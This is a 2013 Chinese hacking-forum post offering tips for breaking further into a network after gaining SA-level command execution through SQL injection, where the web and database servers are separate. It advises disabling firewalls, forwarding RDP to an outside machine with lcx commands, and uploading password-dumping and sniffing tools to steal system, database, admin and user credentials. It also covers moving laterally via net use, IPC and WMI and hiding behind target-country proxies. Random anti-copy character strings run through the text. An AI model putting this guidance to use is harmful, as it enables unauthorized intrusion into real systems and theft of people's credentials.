找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2156|回复: 0
打印 上一主题 下一主题

SA权限网站和数据库分离的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:46:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
/ I! P$ n. H+ K
0 @/ J! L% F4 K. m- s' y  s( o  f; n1 ^; G

6 G% |& A1 R; uSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)! o0 O4 e* h# W$ k9 }' M

9 G4 |1 u$ E  H; ?- f/ q1 L, D3 \+ j/ E* c0 X: J: ^
一、DB机有公网IP.
9 M/ O+ z3 T* N9 |; v6 G+ U4 `1 L% K7 N: m. v9 V! R3 S  @: V) F
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.4 C& O* t8 @& n7 F% _( u

1 k) N* {7 I7 y
# P1 t; [1 _4 T5 Z& N* r5 V$ E2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.# q" L- p8 k* R7 t

' P1 p* {+ z3 G7 h/ F/ E+ ]9 N5 s2 P0 f; E3 l& O0 J
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com; [, ~5 c: R5 o$ A
% A5 S2 X" W7 |/ J7 y
6 |; ~, ?$ s# {. ?2 R6 c
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.: s; U9 r  C8 w2 g" V, T1 V* b7 Z

$ W$ W* `& p! O- c" w% [* E% h) }$ w) @. w" C, K" m: A

" r) h3 }; J) [" }( a二、DB机只有内网IP5 s* y$ a2 m1 J8 a3 W# L
+ r3 v3 x; y/ M$ U  F, J
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
' R' x2 d7 i6 n# T/ ~4 \% u8 m4 e! p7 ]9 P! S
& C5 t' e5 |* q# U
2:停掉防火墙和IP策略再从内往外扫描.
, M% |( T% x# Z; J9 ]7 D# c/ z4 O% L! R3 a4 l6 Z2 b7 P

8 [. A; Y- J& s6 L& Y6 o3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
( ?! V9 ~7 s9 w1 X! C& W4 v* z; p
' c+ v" t: s% s( k! s% M  N$ k: d3 D5 I2 ]1 v0 a
4:学会密码规律分析往往会有惊喜.
- c' Y; U1 H3 t) T+ e% E) ~. ?
3 @1 k! X5 A  x7 r' C$ V$ l& U5 b1 a6 O' E$ Y3 ?: W
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等3 H% m  n4 D* M2 K
8 R8 n0 f" k& G6 p9 h
/ V- g* P! X7 h6 E9 O: R
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表